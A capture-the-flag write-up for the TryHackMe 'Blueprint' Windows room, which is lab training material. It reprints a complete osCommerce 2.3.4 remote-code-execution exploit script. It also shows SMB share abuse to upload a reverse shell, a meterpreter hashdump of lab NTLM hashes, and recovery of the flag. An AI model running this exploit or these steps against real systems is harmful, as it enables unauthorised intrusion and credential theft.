Blueprint - THM
This is the writeup for the TryHackMe easy difficulty room called Blueprint .
This is going to be an exploitable Windows machine.
Recon
CMD: nmap -sT -sV -F $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-28 12:27 CET
Nmap scan report for 10.10.179.32
Host is up (0.12s latency).
Not shown: 90 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPCThere is a webserver running on port 8080 and a Windows SMB server on port 445.
CMD: smbmap -H $IP -u guest -r
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.179.32:445 Name: 10.10.179.32 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
Users READ ONLY
./Users
dw--w--w-- 0 Fri Apr 12 00:36:40 2019 .
dw--w--w-- 0 Fri Apr 12 00:36:40 2019 ..
dw--w--w-- 0 Sun Jan 15 23:38:59 2017 Default
fr--r--r-- 174 Sun Jan 15 23:28:56 2017 desktop.ini
dw--w--w-- 0 Tue Oct 28 12:40:14 2025 Public
Windows NO ACCESS
[*] Closed 1 connectionsRunning the tool smbmap we notice that we are able to write to the directory Public and Default.
The website shows that is an osCommerce 2.3.4 site.
Exploitation
Exploit DB gives us several possibe exploits for the site.
We are going to use the first one .
osCommerce2_3_4RCE.py
import requests
import sys
if(len(sys.argv) != 2):
print("please specify the osCommerce url")
print("format: python3 osCommerce2_3_4RCE.py <url>")
print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog")
sys.exit(0)
baseUrl = sys.argv[1]
testVulnUrl = baseUrl + '/install/install.php'
def rce(command):
#targeting the finish step which is step 4
targetUrl = baseUrl + '/install/install.php?step=4'
payload = "');"
payload += "passthru('" + command + "');" # injecting system command here
payload += "/*"
#injecting parameter
data = {
'DIR_FS_DOCUMENT_ROOT': './',
'DB_DATABASE' : payload
}
response = requests.post(targetUrl, data=data)
if(response.status_code == 200):
#print('[*] Successfully injected payload to config file')
readCMDUrl = baseUrl + '/install/includes/configure.php'
cmd = requests.get(readCMDUrl)
commandRsl = cmd.text.split('\n')
if(cmd.status_code == 200):
#print('[*] System Command Execution Completed')
#removing the error message above
for i in range(2, len(commandRsl)):
print(commandRsl[i])
else:
return '[!] Configure.php not found'
else:
return '[!] Fail to inject payload'
#testing vulnerability accessing the directory
test = requests.get(testVulnUrl)
#checking the install directory still exist or able to access or not
if(test.status_code == 200):
print('[*] Install directory still available, the host likely vulnerable to the exploit.')
#testing system command injection
print('[*] Testing injecting system command to test vulnerability')
cmd = 'whoami'
print('User: ', end='')
err = rce(cmd)
if(err != None):
print(err)
sys.exit(0)
while(True):
cmd = input('RCE_SHELL$ ')
err = rce(cmd)
if(err != None):
print(err)
sys.exit(0)
else:
print('[!] Install directory not found, the host is not vulnerable')
sys.exit(0)Running the python script we can run any command as NT AUTHORITY\SYSTEM.
CMD: python osCommerce2_3_4RCE.py http://$IP:8080/oscommerce-2.3.4/catalog
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: nt authority\system
RCE_SHELL$Using the previously discovered SMB Share we can upload a reverse shell and run it with SYSTEM privileges.
CMD: smbclient //$IP/Users --user guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> cd Public
smb: \Public\> put rev.exe
putting file rev.exe as \Public\rev.exe (51.8 kb/s) (average 51.8 kb/s)Running it from the python script we get our shell back.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::Meterpreter can dump the NTLM hashes by default.
We can also get the ROOT FLAG in the directory C:\Users\Administrator\.
Last updated on